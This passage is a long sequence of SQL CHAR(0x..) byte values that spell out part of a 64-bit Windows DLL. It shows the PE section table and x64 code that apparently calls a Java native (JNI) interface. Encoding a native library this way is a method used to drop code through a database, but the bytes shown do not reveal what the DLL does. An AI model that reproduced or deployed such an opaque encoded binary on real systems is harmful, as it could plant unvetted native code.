(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x70),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x60),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0xc8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x00),CHAR(0x00),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x34),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x35),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x94),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x2e),CHAR(0x72),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x0e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x2e),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x38),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x26),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x2e),CHAR(0x70),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0xc8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x2e),CHAR(0x72),CHAR(0x65),CHAR(0x6c),CHAR(0x6f),CHAR(0x63),CHAR(0x00),CHAR(0x00),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x42),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x18),CHAR(0x48),CHAR(0x89),CHAR(0x7c),CHAR(0x24),CHAR(0x20),CHAR(0x41),CHAR(0x56),CHAR(0x48),CHAR(0x81),CHAR(0xec),CHAR(0x40),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0xe9),CHAR(0x2f),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x33),CHAR(0xc4),CHAR(0x48),CHAR(0x89),CHAR(0x84),CHAR(0x24),CHAR(0x30),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x01),CHAR(0x48),CHAR(0x8d),CHAR(0x54),CHAR(0x24),CHAR(0x30),CHAR(0x41),CHAR(0xb8),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xf1),CHAR(0xff),CHAR(0x50),CHAR(0x30),CHAR(0x83),CHAR(0xf8),CHAR(0xfe),CHAR(0x75),CHAR(0x11),CHAR(0x49),CHAR(0x8b),CHAR(0x06),CHAR(0x48),CHAR(0x8d),CHAR(0x54),CHAR(0x24),CHAR(0x30),CHAR(0x45),CHAR(0x33),CHAR(0xc0),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x50),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x54),CHAR(0x24),CHAR(0x40),CHAR(0xb9),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x05),CHAR(0x6b),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x66),CHAR(0x66),CHAR(0x66),CHAR(0x0f),CHAR(0x1f),CHAR(0x84),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x92),CHAR(0x80),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x10),CHAR(0x00),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0x10),CHAR(0x48),CHAR(0x8d),CHAR(0x80),CHAR(0x80),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0x80),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0xa0),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0x90),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0xb0),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0xa0),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0xc0),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0xb0),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0xd0),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0xc0),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0xe0),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0xd0),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0xf0),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0xe0),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0xf0),CHAR(0x48),CHAR(0x83),CHAR(0xe9),CHAR(0x01),CHAR(0x75),CHAR(0xad),CHAR(0x48),CHAR(0x8b),CHAR(0x48),CHAR(0x60),CHAR(0x0f),CHAR(0x10),CHAR(0x00),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0x10),CHAR(0x0f),CHAR(0x11),CHAR(0x02),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0x20),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0x10),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0x30),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0x20),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0x40),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0x30),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0x50),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0x40),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0x50),CHAR(0x48),CHAR(0x89),CHAR(0x4a),CHAR(0x60),CHAR(0x8b),CHAR(0x48),CHAR(0x68),CHAR(0x89),CHAR(0x4a),CHAR(0x68),CHAR(0x0f),CHAR(0xb7),CHAR(0x48),CHAR(0x6c),CHAR(0x66),CHAR(0x89),CHAR(0x4a),CHAR(0x6c),CHAR(0x0f),CHAR(0xb6),CHAR(0x48),CHAR(0x6e),CHAR(0x88),CHAR(0x4a),CHAR(0x6e),CHAR(0xba),CHAR(0xef),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x01),CHAR(0xff),CHAR(0x90),CHAR(0x80),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x41),CHAR(0xb9),CHAR(0xef),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xf0),CHAR(0x45),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8d),CHAR(0x44),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x8b),CHAR(0xd6),CHAR(0x48),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x4c),CHAR(0x8b),CHAR(0x11),CHAR(0x41),CHAR(0xff),CHAR(0x92),CHAR(0x80),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8d),CHAR(0x15),CHAR(0xfb),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0x01),CHAR(0x41),CHAR(0xff),CHAR(0x50),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8d),CHAR(0x0d),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8d),CHAR(0x05),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xd0),CHAR(0x48),CHAR(0x8b),CHAR(0xf8),CHAR(0x4c),CHAR(0x8b),CHAR(0x11),CHAR(0x41),CHAR(0xff),CHAR(0x92),CHAR(0x88),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0xd7),CHAR(0x4c),CHAR(0x8b),CHAR(0xc0),CHAR(0x4c),CHAR(0x8b),CHAR(0x09),CHAR(0x41),CHAR(0xff),CHAR(0x91),CHAR(0x90),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8d),CHAR(0x0d),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8d),CHAR(0x05),CHAR(0x11),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xd7),CHAR(0x48),CHAR(0x8b),CHAR(0xd8),CHAR(0x4c),CHAR(0x8b),CHAR(0x11),CHAR(0x41),CHAR(0xff),CHAR(0x92),CHAR(0x08),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8b),CHAR(0xce),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x28),CHAR(0xef),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc0),CHAR(0x48),CHAR(0x8b),CHAR(0xd3),CHAR(0x48),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0x11),CHAR(0x41),CHAR(0xff),CHAR(0x92),CHAR(0x10),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0xd6),CHAR(0x4c),CHAR(0x8b),CHAR(0x01),CHAR(0x41),CHAR(0xff),CHAR(0x90),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x8b),CHAR(0x16),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x52),CHAR(0x28),CHAR(0xb8),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x8c),CHAR(0x24),CHAR(0x30),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x33),CHAR(0xcc),CHAR(0xe8),CHAR(0xb0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8d),CHAR(0x9c),CHAR(0x24),CHAR(0x40),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x8b),CHAR(0x5b),CHAR(0x18),CHAR(0x49),CHAR(0x8b),CHAR(0x73),CHAR(0x20),CHAR(0x49),CHAR(0x8b),CHAR(0x7b),CHAR(0x28),CHAR(0x49),CHAR(0x8b),CHAR(0xe3),CHAR(0x41),CHAR(0x5e),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x4d),CHAR(0x8b),CHAR(0x41),CHAR(0x38),CHAR(0x48),CHAR(0x8b),CHAR(0xca),CHAR(0x49),CHAR(0x8b),CHAR(0xd1),CHAR(0xe8),CHAR(0x0d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x45),CHAR(0x8b),CHAR(0x18),CHAR(0x48),CHAR(0x8b),CHAR(0xda),CHAR(0x41),CHAR(0x83),CHAR(0xe3),CHAR(0xf8),CHAR(0x4c),CHAR(0x8b),CHAR(0xc9),CHAR(0x41),CHAR(0xf6),CHAR(0x00),CHAR(0x04),CHAR(0x4c),CHAR(0x8b),CHAR(0xd1),CHAR(0x74),CHAR(0x13),CHAR(0x41),CHAR(0x8b),CHAR(0x40),CHAR(0x08),CHAR(0x4d),CHAR(0x63),CHAR(0x50),CHAR(0x04),CHAR(0xf7),CHAR(0xd8),CHAR(0x4c),CHAR(0x03),CHAR(0xd1),CHAR(0x48),CHAR(0x63),CHAR(0xc8),CHAR(0x4c),CHAR(0x23),CHAR(0xd1),CHAR(0x49),CHAR(0x63),CHAR(0xc3),CHAR(0x4a),CHAR(0x8b),CHAR(0x14),CHAR(0x10),CHAR(0x48),CHAR(0x8b),CHAR(0x43),CHAR(0x10),CHAR(0x8b),CHAR(0x48),CHAR(0x08),CHAR(0x48),CHAR(0x8b),CHAR(0x43),CHAR(0x08),CHAR(0xf6),CHAR(0x44),CHAR(0x01),CHAR(0x03),CHAR(0x0f),CHAR(0x74),CHAR(0x0b),CHAR(0x0f),CHAR(0xb6),CHAR(0x44),CHAR(0x01),CHAR(0x03),CHAR(0x83),CHAR(0xe0),CHAR(0xf0),CHAR(0x4c),CHAR(0x03),CHAR(0xc8),CHAR(0x4c),CHAR(0x33),CHAR(0xca),CHAR(0x49),CHAR(0x8b),CHAR(0xc9),CHAR(0x5b),CHAR(0xe9),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x66),CHAR(0x66),CHAR(0x0f),CHAR(0x1f),CHAR(0x84),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x3b),CHAR(0x0d),CHAR(0x41),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0xf2),CHAR(0x75),CHAR(0x12),CHAR(0x48),CHAR(0xc1),CHAR(0xc1),CHAR(0x10),CHAR(0x66),CHAR(0xf7),CHAR(0xc1),CHAR(0xff),CHAR(0xff),CHAR(0xf2),CHAR(0x75),CHAR(0x02),CHAR(0xf2),CHAR(0xc3),CHAR(0x48),CHAR(0xc1),CHAR(0xc9),CHAR(0x10),CHAR(0xe9),CHAR(0x97),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x85),CHAR(0xd2),CHAR(0x74),CHAR(0x39),CHAR(0x83),CHAR(0xea),CHAR(0x01),CHAR(0x74),CHAR(0x28),CHAR(0x83),CHAR(0xea),CHAR(0x01),CHAR(0x74),CHAR(0x16),CHAR(0x83),CHAR(0xfa),CHAR(0x01),CHAR(0x74),CHAR(0x0a),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xe8),CHAR(0x7e),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x05),CHAR(0xe8),CHAR(0x4f),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0xb6),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0x49),CHAR(0x8b),CHAR(0xd0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xe9),CHAR(0x0f),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4d),CHAR(0x85),CHAR(0xc0),CHAR(0x0f),CHAR(0x95),CHAR(0xc1),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xe9),CHAR(0x18),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x7c),CHAR(0x24),CHAR(0x20),CHAR(0x41),CHAR(0x56),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xf2),CHAR(0x4c),CHAR(0x8b),CHAR(0xf1),CHAR(0x33),CHAR(0xc9),CHAR(0xe8),CHAR(0xee),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x0f),CHAR(0x84),CHAR(0xc8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x75),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xd8),CHAR(0x88),CHAR(0x44),CHAR(0x24),CHAR(0x40),CHAR(0x40),CHAR(0xb7),CHAR(0x01),CHAR(0x83),CHAR(0x3d),CHAR(0x6d),CHAR(0x32),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x85),CHAR(0xc5),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x5d),CHAR(0x32),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xc0),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x74),CHAR(0x4f),CHAR(0xe8),CHAR(0xcf),CHAR(0x09),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0